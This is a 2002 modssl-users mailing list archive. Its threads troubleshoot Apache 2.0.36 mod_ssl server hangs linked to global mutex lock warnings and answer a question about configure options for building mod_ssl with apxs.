> Apache Version:        2.0.36
> mod_ssl version:    2.8.7-4
> openssl version        0.9.6b-18
>
> System is RedHat 7.3, Apache was built from source tarball, openssl is
> from the RPM that installs w/RH 7.3
>
> I can send httpd.conf settings, if necesarry.
>
> Thanks in advance,


-- 
.tom

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 15:02:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18094; Thu, 6 Jun 2002 15:01:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA18064; Thu, 6 Jun 2002 15:00:47 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7506A4CE765; Thu,  6 Jun 2002 15:00:46 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 1155D28AC8; Thu,  6 Jun 2002 14:27:55 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pr1-exch01.payroll1.com id OAA15399; Thu, 6 Jun 2002 14:20:10 +0200 (MET DST)
Received: by PR1-EXCH01 with Internet Mail Service (5.5.2653.19)
	id ; Thu, 6 Jun 2002 08:17:07 -0400
Received: from ameritech.net (10.0.0.125 [10.0.0.125]) by pr1-exch01.payroll1.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id K0KRBMW7; Thu, 6 Jun 2002 08:17:02 -0400
From: =?iso-8859-1?Q?Thomas_Gagn=E9?= 
To: modssl-users 
Message-ID: <3CFF537B.1030802@ameritech.net>
Date: Thu, 06 Jun 2002 08:20:11 -0400
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1
X-Accept-Language: en-us, en
MIME-Version: 1.0
Subject: [Fwd: Re: Problem with: Apache/2.0.36 (Unix) mod_ssl/2.0.36 OpenSSL/0.9.6d]
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Thomas_Gagn=E9?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



-------- Original Message --------
Subject: Re: Problem with: Apache/2.0.36 (Unix) 
mod_ssl/2.0.36 OpenSSL/0.9.6d
Date: Tue, 04 Jun 2002 15:48:36 -0400
From: Thomas Gagné 
Organization: http://extra.newsguy.com
Newsgroups: comp.infosystems.www.servers.unix
References:  
 
<3CFD1348.1040105@pobox.com>

I'm having a similar problem with hangs using 2.0.36, but
didn't know it may have been caused by going from http: to
https:.  Regardless, I noticed my SSLMutex setting was
file:logs/ssl_mutex.  The documentation doesn't say the file
must exist, and on my system it didn't exist before
'startssl' and it didn't exist after 'startssl'.  I'm
curious if anyone else noticed that.

Also, if "SSLMutex none" fixes it, I wonder if "SSLMutex
sem" could similarly fix it.  Is it just a problem with file:?

Ken Roser wrote:
 > I also am experiencing the same problem as Harley on my 
Redhat 7.3 box.
 > I tried updating from OpenSSL 9.6b to 9.6d to fix it but 
that didn't work.
 >
 > Jan's fix of  "SSLMutex none" does solve the problem for 
me but I'd like
 > to learn more about the consequences of eliminating the 
mutexes.  Can
 > someone provide more detail on this issue?
 >
 > Jan P. Sorensen wrote:
 >
 >> Well known error at least om Mandrake 8.2
 >>
 >> Try: SSLMutex none
 >>
 >> Jan
 >>
 >> On Tue, 4 Jun 2002, Harley Puthuff wrote:
 >>
 >>
 >>
 >>> I used to use Apache 1.3.19 and Apache SSL without any 
problem. After
 >>> installing Apache v.2, though, I get sporadic 'hangs' 
when a client
 >>> switches
 >>> from an http page to an https page. I see in the 
ssl_engine_log that
 >>> mutex
 >>> is mentioned a lot. I've tried different options for 
the SSLMutex
 >>> directive,
 >>> but it doesn't seem to make the warning go away.
 >>>
 >>> This is what I'm using now:
 >>>
 >>> SSLPassPhraseDialog  builtin
 >>> SSLSessionCache 
dbm:/usr/local/apache2/logs/ssl_gcache
 >>> SSLSessionCacheTimeout  300
 >>> SSLMutex  file:/usr/local/apache2/logs/ssl_mutex
 >>> SSLRandomSeed startup builtin
 >>> SSLRandomSeed connect builtin
 >>> SSLLog      /usr/local/apache2/logs/ssl_engine_log
 >>> SSLLogLevel info
 >>>
 >>> And this is an example of what happens according to the 
SSL log. The
 >>> first
 >>> connection succeeded, the second one hung up:
 >>>
 >>> [03/Jun/2002 18:37:03 03630] [info]  Connection to 
child 19 established
 >>> (server www.astdgoldengate.org:443, client 12.236.195.38)
 >>> [03/Jun/2002 18:37:03 03630] [info]  Seeding PRNG with 
136 bytes of
 >>> entropy
 >>> [03/Jun/2002 18:37:03 03630] [warn]  Failed to acquire 
global mutex lock
 >>> [03/Jun/2002 18:37:03 03630] [warn]  Failed to release 
global mutex lock
 >>> [03/Jun/2002 18:37:03 03630] [info]  Connection: Client 
IP:
 >>> 12.236.195.38,
 >>> Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
 >>> [03/Jun/2002 18:37:03 03630] [info]  Initial (No.1) 
HTTPS request
 >>> received
 >>> for child 19 (server www.astdgoldengate.org:443)
 >>> [03/Jun/2002 18:37:19 03630] [info]  Connection to 
child 19 closed with
 >>> standard shutdown(server www.astdgoldengate.org:443, 
client
 >>> 12.236.195.38)
 >>> [03/Jun/2002 18:40:49 03642] [info]  Connection to 
child 25 established
 >>> (server www.astdgoldengate.org:443, client 12.236.195.38)
 >>> [03/Jun/2002 18:40:49 03642] [info]  Seeding PRNG with 
136 bytes of
 >>> entropy
 >>> [03/Jun/2002 18:40:49 03642] [warn]  Failed to acquire 
global mutex lock
 >>> [03/Jun/2002 18:40:49 03642] [warn]  Failed to release 
global mutex lock
 >>>
 >>> I'd appreciate any input anyone has with a similar 
scenario.
 >>>
 >>> Thanks,
 >>>
 >>> /s/ Harley Puthuff
 >>>
 >>>
 >>>
 >>>
 >>
 >>
 >>
 >>
 >
 >


-- 
.tom


-- 
.tom
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 15:46:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA21112; Thu, 6 Jun 2002 15:45:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id PAA21065; Thu, 6 Jun 2002 15:44:24 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g56Di0r09096
	for ; Thu, 6 Jun 2002 14:44:05 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Thu, 6 Jun 2002 14:43:57 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067187@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Server stops serving
Date: Thu, 6 Jun 2002 14:43:56 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I tried exactly the same on RedHat 7.2, with the same result. If there is a
way round this I'd like to know as well, as for now I've given up on Apache
2.0 with RedHat 7.2.

Out of interest, is the user and group set to "apache" in the httpd.conf
file. Does the "apache" user and group exist?

Finally, have you removed (or not installed) the apache version rpm that
comes with Red Hat 7.2?

Thanks.
John

> -----Original Message-----
> From: Thomas Gagne [mailto:tgagne@ameritech.net]
> Sent: 06 June 2002 13:20
> To: modssl-users@modssl.org
> Subject: Re: Server stops serving
> 
> 
> There was a post in usenet about this issue.  I'll forward one of the 
> last messages with some of the history.  It should help.
> 
> Loren K. Louthan wrote:
> 
> > Hello,
> >
> > Hopefully, this will ring a bell for someone:
> >
> > My secure server starts up with no problem. It serves pages 
> for 5 mins.,
> > 10 mins, sometimes even a half-hour. Eventually, however, it stops
> > serving pages. The clients will see "opening page 
> *server-address* ", or
> > "Requesting page from *server-address*". But the page never 
> shows up, it
> > is blank.And we don't get any "Time-out" error messages, either.
> >
> > At about the time this happens, I get the following in my 
> ssl_engine_log
> > file:
> >
> > [05/Jun/2002 11:22:35 09388] [info]  Connection to child 10 
> established
> > (server www.MYDOMAINNAME.com:443, xxx.xxx.xxx.xxx)
> > [05/Jun/2002 11:22:35 09388] [info]  Seeding PRNG with 136 bytes of 
> > entropy
> > [05/Jun/2002 11:22:36 09388] [warn]  Failed to acquire 
> global mutex lock
> > [05/Jun/2002 11:22:36 09388] [warn]  Failed to release 
> global mutex lock
> >
> > Now, in %server-root%/logs (the path specified in 
> httpd.conf) there is a
> > ssl_mutex file, but it is empty.
> >
> > There is no relevant error in the either server's or system 
> error logs.
> >
> > Server config is:
> > Apache Version:        2.0.36
> > mod_ssl version:    2.8.7-4
> > openssl version        0.9.6b-18
> >
> > System is RedHat 7.3, Apache was built from source tarball, 
> openssl is
> > from the RPM that installs w/RH 7.3
> >
> > I can send httpd.conf settings, if necesarry.
> >
> > Thanks in advance,
> 
> 
> -- 
> .tom
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 17:37:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA27577; Thu, 6 Jun 2002 17:36:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id RAA27533; Thu, 6 Jun 2002 17:35:39 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g56FWEX25673;
	Thu, 6 Jun 2002 11:32:14 -0400
Date: Thu, 6 Jun 2002 11:32:14 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: "Loren K. Louthan" 
cc: modssl-users@modssl.org
Subject: Re: Server stops serving
In-Reply-To: <3CFE7204.3060307@srar.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 5 Jun 2002, Loren K. Louthan wrote:

> [05/Jun/2002 11:22:36 09388] [warn]  Failed to acquire global mutex lock
> [05/Jun/2002 11:22:36 09388] [warn]  Failed to release global mutex lock

That's a bug.  (For the full discussion on the matter, see PR8124 at
http://nagoya.apache.org/bugzilla/show_bug.cgi?id=8124 .)  It was fixed in
CVS a few weeks ago and the fix will be in 2.0.37 when it is released
(hopefully very very soon).


> Apache Version:		2.0.36
> mod_ssl version:	2.8.7-4

Um, that combination is not possible.  :)  I'll assume you meant Apache
2.0.36 and the mod_ssl that came with it (also numbered 2.0.36).

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 17:39:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA27742; Thu, 6 Jun 2002 17:38:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lclweb.lclcan.com id RAA27680; Thu, 6 Jun 2002 17:37:52 +0200 (MET DST)
Received: (from uucp@localhost)
	by lclweb.lclcan.com (8.9.3/8.9.3) id LAA28874
	for ; Thu, 6 Jun 2002 11:52:03 -0400
Received: from olympus.lclcan.com(205.205.137.131) by lclweb.lclcan.com via smap (V2.1)
	id sma028869; Thu, 6 Jun 02 11:51:52 -0400
Received: from doctor (doctor.lclcan.com [205.205.137.151]) by olympus.lclcan.com (8.8.8/SCO5) with SMTP id LAA13702 for ; Thu, 6 Jun 2002 11:36:32 -0400 (EDT)
Message-ID: <018301c20d70$24e9de40$c889cdcd@lclcan.com>
From: "Don" 
To: 
References: <011601c20bd5$dee22f60$c889cdcd@lclcan.com> <20020604145755.GA10641@redhat.com>
Subject: Re: Installing ModSSL Question
Date: Thu, 6 Jun 2002 11:37:47 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0180_01C20D4E.94950700"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Don" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0180_01C20D4E.94950700
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,

I looked the documentation for compiling mod_ssl using apxs and noticed =
the configure options as such:

./configure \
    --with-apxs[=3D/path/to/apache/bin/apxs] \
    --with-ssl=3D/path/to/openssl

Is the first option the path to the httpd binary (httpd) or the config =
file (httpd.conf)?
Is the second option the path to the openssl binary (openssl)?

Thanks,
Don
  ----- Original Message -----=20
  From: Nalin Dahyabhai=20
  To: modssl-users@modssl.org=20
  Sent: Tuesday, June 04, 2002 10:57 AM
  Subject: Re: Installing ModSSL Question


  On Tue, Jun 04, 2002 at 10:41:06AM -0400, Don wrote:
  > I have downloaded the mod_ssl-2.8.5-1.3.22 tarball from the web =
site.  Upon reading the documentation, I find that I need to recompile =
apache with additional configuration options in order to install ModSSL.
  >=20
  > Here is my dilemma.  I never compiled Apache from source but rather =
installed from rpm packages.  Therefore, there doesn't seem to be any =
way I can install ModSSL.  I've looked at the FAQ but can see no hints =
on installing ModSSL once Apache is installed.  Neither have I found and =
ModSSL rpm package.

  The packaged version for Red Hat Linux already has the necessary EAPI
  patch applied.  You should be able to either compile mod_ssl using =
apxs
  (which is included in the apache-devel package) or rebuild a mod_ssl =
RPM
  package from a later release using 'rpm --rebuild' (though I haven't =
done
  that lately, YMMV).

  HTH,

  Nalin
  ______________________________________________________________________
  Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
  User Support Mailing List                      modssl-users@modssl.org
  Automated List Manager                            majordomo@modssl.org

------=_NextPart_000_0180_01C20D4E.94950700
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi,


 


I looked the documentation for =
compiling mod_ssl=20
using apxs and noticed the configure options as =
such:


 


./configure \
   =20
--with-apxs[=3D/path/to/apache/bin/apxs] \
   =20
--with-ssl=3D/path/to/openssl


 


Is the first option the path to =
the httpd=20
binary (httpd) or the config file (httpd.conf)?


Is the second option the path to the =
openssl binary=20
(openssl)?


 


Thanks,


Don


  
----- Original Message ----- 

  From:=20
  Nalin =
Dahyabhai=20
  
  
  
Sent: Tuesday, June 04, 2002 =
10:57=20
  AM

  
Subject: Re: Installing ModSSL=20
  Question

  

On Tue, Jun 04, 2002 at 10:41:06AM -0400, Don =
wrote:
> I=20
  have downloaded the mod_ssl-2.8.5-1.3.22 tarball from the web =
site.  Upon=20
  reading the documentation, I find that I need to recompile apache with =

  additional configuration options in order to install ModSSL.
> =

>=20
  Here is my dilemma.  I never compiled Apache from source but =
rather=20
  installed from rpm packages.  Therefore, there doesn't seem to be =
any way=20
  I can install ModSSL.  I've looked at the FAQ but can see no =
hints on=20
  installing ModSSL once Apache is installed.  Neither have I found =
and=20
  ModSSL rpm package.

The packaged version for Red Hat Linux =
already has=20
  the necessary EAPI
patch applied.  You should be able to =
either=20
  compile mod_ssl using apxs
(which is included in the apache-devel =
package)=20
  or rebuild a mod_ssl RPM
package from a later release using 'rpm =
--rebuild'=20
  (though I haven't done
that lately,=20
  =
YMMV).

HTH,

Nalin
______________________________________=
________________________________
Apache=20
  Interface to OpenSSL=20
  =
(mod_ssl)          &nbs=
p;       =20
  www.modssl.org
User Support =
Mailing=20
  =
List           &nb=
sp;         =20
  modssl-users@modssl.org
Au=
tomated=20
  List=20
  =
Manager           =
            &=
nbsp;   =20
  majordomo@modssl.org


------=_NextPart_000_0180_01C20D4E.94950700--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 18:51:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA03390; Thu, 6 Jun 2002 18:50:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id SAA03361; Thu, 6 Jun 2002 18:49:51 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g56GkR225855
	for ; Thu, 6 Jun 2002 12:46:27 -0400
Date: Thu, 6 Jun 2002 12:46:27 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Installing ModSSL Question
In-Reply-To: <018301c20d70$24e9de40$c889cdcd@lclcan.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 6 Jun 2002, Don wrote:

> ./configure \
>     --with-apxs[=/path/to/apache/bin/apxs] \
>     --with-ssl=/path/to/openssl
>
> Is the first option the path to the httpd binary (httpd) or the config
> file (httpd.conf)?

Neither.  It's the path to apxs.  :)  apxs is a script that usually sits
in the same directory as the httpd binary, but it's not the same thing.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 23:09:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA18408; Thu, 6 Jun 2002 23:08:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id XAA18365; Thu, 6 Jun 2002 23:07:20 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6FE974CE72D; Thu,  6 Jun 2002 23:07:18 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 398EA28698; Thu,  6 Jun 2002 20:32:16 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from saintmary.uolinc.com id SAA01207; Thu, 6 Jun 2002 18:18:34 +0200 (MET DST)
Received: from sahure.intranet (sahure.intranet [192.168.207.49])
	by saintmary.uolinc.com (8.11.6/8.11.1) with ESMTP id g56GLvH31514
	for ; Thu, 6 Jun 2002 13:21:59 -0300
Received: by sahure.intranet with Internet Mail Service (5.5.2653.19)
	id ; Thu, 6 Jun 2002 13:17:20 -0300
Message-ID: <40665E0BC7EE054A94F3060F4C107A4C1C8523@siamun.intranet>
From: Eider Silva de Oliveira 
To: "'modssl-users@modssl.org'" 
Subject: RE: [Fwd: Re: Problem with: Apache/2.0.36 (Unix) mod_ssl/2.0.36 O
	penSSL/0.9.6d]
Date: Thu, 6 Jun 2002 13:17:17 -0300 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C20D75.A0642E90"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eider Silva de Oliveira 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C20D75.A0642E90
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

>Also, if "SSLMutex none" fixes it, I wonder if "SSLMutex
>sem" could similarly fix it.  Is it just a problem with file:?
No, because there is another bug in semaphore mutex. The semaphore is
created under root, and the user nobody doesn't have permission to =
alter it.

[]s
  =20


_________________________________________
Eider Oliveira
ICQ#:116119057

Engenharia de Sistemas - Uol Inc
eoliveira@uolinc.com
_________________________________________


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Thomas Gagn=E9
Sent: quinta-feira, 6 de junho de 2002 09:20
To: modssl-users
Subject: [Fwd: Re: Problem with: Apache/2.0.36 (Unix) mod_ssl/2.0.36
OpenSSL/0.9.6d]


Quer ter seu pr=F3prio endere=E7o na Internet?
Garanta j=E1 o seu e ainda ganhe cinco e-mails personalizados.
Dom=EDniosBOL - http://dominios.bol.com.br







-------- Original Message --------
Subject: Re: Problem with: Apache/2.0.36 (Unix)=20
mod_ssl/2.0.36 OpenSSL/0.9.6d
Date: Tue, 04 Jun 2002 15:48:36 -0400
From: Thomas Gagn=E9 
Organization: http://extra.newsguy.com
Newsgroups: comp.infosystems.www.servers.unix
References: =20
=20
<3CFD1348.1040105@pobox.com>

I'm having a similar problem with hangs using 2.0.36, but
didn't know it may have been caused by going from http: to
https:.  Regardless, I noticed my SSLMutex setting was
file:logs/ssl_mutex.  The documentation doesn't say the file
must exist, and on my system it didn't exist before
'startssl' and it didn't exist after 'startssl'.  I'm
curious if anyone else noticed that.

Also, if "SSLMutex none" fixes it, I wonder if "SSLMutex
sem" could similarly fix it.  Is it just a problem with file:?

Ken Roser wrote:
 > I also am experiencing the same problem as Harley on my=20
Redhat 7.3 box.
 > I tried updating from OpenSSL 9.6b to 9.6d to fix it but=20
that didn't work.
 >
 > Jan's fix of  "SSLMutex none" does solve the problem for=20
me but I'd like
 > to learn more about the consequences of eliminating the=20
mutexes.  Can
 > someone provide more detail on this issue?
 >
 > Jan P. Sorensen wrote:
 >
 >> Well known error at least om Mandrake 8.2
 >>
 >> Try: SSLMutex none
 >>
 >> Jan
 >>
 >> On Tue, 4 Jun 2002, Harley Puthuff wrote:
 >>
 >>
 >>
 >>> I used to use Apache 1.3.19 and Apache SSL without any=20
problem. After
 >>> installing Apache v.2, though, I get sporadic 'hangs'=20
when a client
 >>> switches
 >>> from an http page to an https page. I see in the=20
ssl_engine_log that
 >>> mutex
 >>> is mentioned a lot. I've tried different options for=20
the SSLMutex
 >>> directive,
 >>> but it doesn't seem to make the warning go away.
 >>>
 >>> This is what I'm using now:
 >>>
 >>> SSLPassPhraseDialog  builtin
 >>> SSLSessionCache=20
dbm:/usr/local/apache2/logs/ssl_gcache
 >>> SSLSessionCacheTimeout  300
 >>> SSLMutex  file:/usr/local/apache2/logs/ssl_mutex
 >>> SSLRandomSeed startup builtin
 >>> SSLRandomSeed connect builtin
 >>> SSLLog      /usr/local/apache2/logs/ssl_engine_log
 >>> SSLLogLevel info
 >>>
 >>> And this is an example of what happens according to the=20
SSL log. The
 >>> first
 >>> connection succeeded, the second one hung up:
 >>>
 >>> [03/Jun/2002 18:37:03 03630] [info]  Connection to=20
child 19 established
 >>> (server www.astdgoldengate.org:443, client 12.236.195.38)
 >>> [03/Jun/2002 18:37:03 03630] [info]  Seeding PRNG with=20
136 bytes of
 >>> entropy
 >>> [03/Jun/2002 18:37:03 03630] [warn]  Failed to acquire=20
global mutex lock
 >>> [03/Jun/2002 18:37:03 03630] [warn]  Failed to release=20
global mutex lock
 >>> [03/Jun/2002 18:37:03 03630] [info]  Connection: Client=20
IP:
 >>> 12.236.195.38,
 >>> Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
 >>> [03/Jun/2002 18:37:03 03630] [info]  Initial (No.1)=20
HTTPS request
 >>> received
 >>> for child 19 (server www.astdgoldengate.org:443)
 >>> [03/Jun/2002 18:37:19 03630] [info]  Connection to=20
child 19 closed with
 >>> standard shutdown(server www.astdgoldengate.org:443,=20
client
 >>> 12.236.195.38)
 >>> [03/Jun/2002 18:40:49 03642] [info]  Connection to=20
child 25 established
 >>> (server www.astdgoldengate.org:443, client 12.236.195.38)
 >>> [03/Jun/2002 18:40:49 03642] [info]  Seeding PRNG with=20
136 bytes of
 >>> entropy
 >>> [03/Jun/2002 18:40:49 03642] [warn]  Failed to acquire=20
global mutex lock
 >>> [03/Jun/2002 18:40:49 03642] [warn]  Failed to release=20
global mutex lock
 >>>
 >>> I'd appreciate any input anyone has with a similar=20
scenario.
 >>>
 >>> Thanks,
 >>>
 >>> /s/ Harley Puthuff
 >>>
 >>>
 >>>
 >>>
 >>
 >>
 >>
 >>
 >
 >


--=20
.tom


--=20
.tom
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C20D75.A0642E90
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






RE: [Fwd: Re: Problem with: Apache/2.0.36 (Unix) mod_ssl/2.0.36 =
OpenSSL/0.9.6d]




>Also, if "SSLMutex none" fixes it, I =
wonder if "SSLMutex

>sem" could similarly fix it.  Is it =
just a problem with file:?

No, because there is another bug in semaphore mutex. =
The semaphore is created under root, and the user nobody doesn't have =
permission to alter it.



[]s

   






_________________________________________

Eider Oliveira

ICQ#:116119057




Engenharia de Sistemas - Uol Inc

eoliveira@uolinc.com

_________________________________________






-----Original Message-----

From: owner-modssl-users@modssl.org

[mailto:owner-modssl-users@=
modssl.org]On Behalf Of Thomas Gagn=E9

Sent: quinta-feira, 6 de junho de 2002 09:20

To: modssl-users

Subject: [Fwd: Re: Problem with: Apache/2.0.36 =
(Unix) mod_ssl/2.0.36

OpenSSL/0.9.6d]






Quer ter seu pr=F3prio endere=E7o na Internet?

Garanta j=E1 o seu e ainda ganhe cinco e-mails =
personalizados.

Dom=EDniosBOL - http://dominios.bol.com.br
















-------- Original Message --------

Subject: Re: Problem with: Apache/2.0.36 (Unix) =


mod_ssl/2.0.36 OpenSSL/0.9.6d

Date: Tue, 04 Jun 2002 15:48:36 -0400

From: Thomas Gagn=E9 =
<tgagne@ameritech.net>

Organization: http://extra.newsguy.com

Newsgroups: comp.infosystems.www.servers.unix

References: =
<s9VK8.162210$L76.247490@rwcrnsc53> 

<Pine.GHP.4.40.0206040617570.104-100000@garm.adm.ku.dk> =


<3CFD1348.1040105@pobox.com>




I'm having a similar problem with hangs using 2.0.36, =
but

didn't know it may have been caused by going from =
http: to

https:.  Regardless, I noticed my SSLMutex =
setting was

file:logs/ssl_mutex.  The documentation =
doesn't say the file

must exist, and on my system it didn't exist =
before

'startssl' and it didn't exist after =
'startssl'.  I'm

curious if anyone else noticed that.




Also, if "SSLMutex none" fixes it, I wonder =
if "SSLMutex

sem" could similarly fix it.  Is it just a =
problem with file:?




Ken Roser wrote:

 > I also am experiencing the same problem =
as Harley on my 

Redhat 7.3 box.

 > I tried updating from OpenSSL 9.6b to =
9.6d to fix it but 

that didn't work.

 >

 > Jan's fix of  "SSLMutex =
none" does solve the problem for 

me but I'd like

 > to learn more about the consequences of =
eliminating the 

mutexes.  Can

 > someone provide more detail on this =
issue?

 >

 > Jan P. Sorensen wrote:

 >

 >> Well known error at least om Mandrake =
8.2

 >>

 >> Try: SSLMutex none

 >>

 >> Jan

 >>

 >> On Tue, 4 Jun 2002, Harley Puthuff =
wrote:

 >>

 >>

 >>

 >>> I used to use Apache 1.3.19 and =
Apache SSL without any 

problem. After

 >>> installing Apache v.2, though, I =
get sporadic 'hangs' 

when a client

 >>> switches

 >>> from an http page to an https =
page. I see in the 

ssl_engine_log that

 >>> mutex

 >>> is mentioned a lot. I've tried =
different options for 

the SSLMutex

 >>> directive,

 >>> but it doesn't seem to make the =
warning go away.

 >>>

 >>> This is what I'm using =
now:

 >>>

 >>> SSLPassPhraseDialog  =
builtin

 >>> SSLSessionCache 

dbm:/usr/local/apache2/logs/ssl_gcache

 >>> SSLSessionCacheTimeout  =
300

 >>> SSLMutex  file:/usr/local/apache2/logs/ssl_mutex

 >>> SSLRandomSeed startup =
builtin

 >>> SSLRandomSeed connect =
builtin

 >>> =
SSLLog      =
/usr/local/apache2/logs/ssl_engine_log

